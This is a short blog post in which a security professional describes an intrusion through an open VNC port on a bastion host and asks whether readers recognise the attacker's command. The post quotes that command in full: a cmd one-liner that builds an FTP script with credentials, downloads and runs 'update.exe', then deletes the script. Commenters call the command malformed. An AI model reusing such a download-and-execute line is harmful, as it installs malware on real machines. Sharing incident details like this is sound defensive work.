Anyone seen this?

I've got a bastion hots that had vnc wide open.  I just got a connection.  It fired a ctrl-atl-del, opened a task manager, and ran cmd.exe.  It then executed the following command.  I was able to get a screen shot before the window disappeared, but it looked like the command was not successful.  The attackered disconnected immediately.  I have no extra users, but am downloading Helix right now to see if anything really happened.  I also have a pcap.  But does this look familiar to anyone?

cmd /c net set 21 >> ij &echo user ingenieurisiv aiisiv >> ij &echo binary >> ij &echo get update.exe >> ij &echo bye >> ij &ftp -n -v -s:ij &del ij &update.exe &net start SharedAccess &exit

Author: Xavier Ashe

Entrepreneur, Infosec Executive, CISSP, CISM, Ironman triathlete, traveler, UU, paleo, father of 8, goyishe, gamer, & geek.

0 thoughts on “Anyone seen this?”

  1. Are you sure the first part is correct? “net set 21 >> ij” does not make any sense, I would expect him to specify the ftp host there.


  2. Yeah… we have a screen shot of the attack. It looks like a buggy bot to me. NET SET is not a valid command on XP, and I don't think it's a valid command on any OS.


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )


Connecting to %s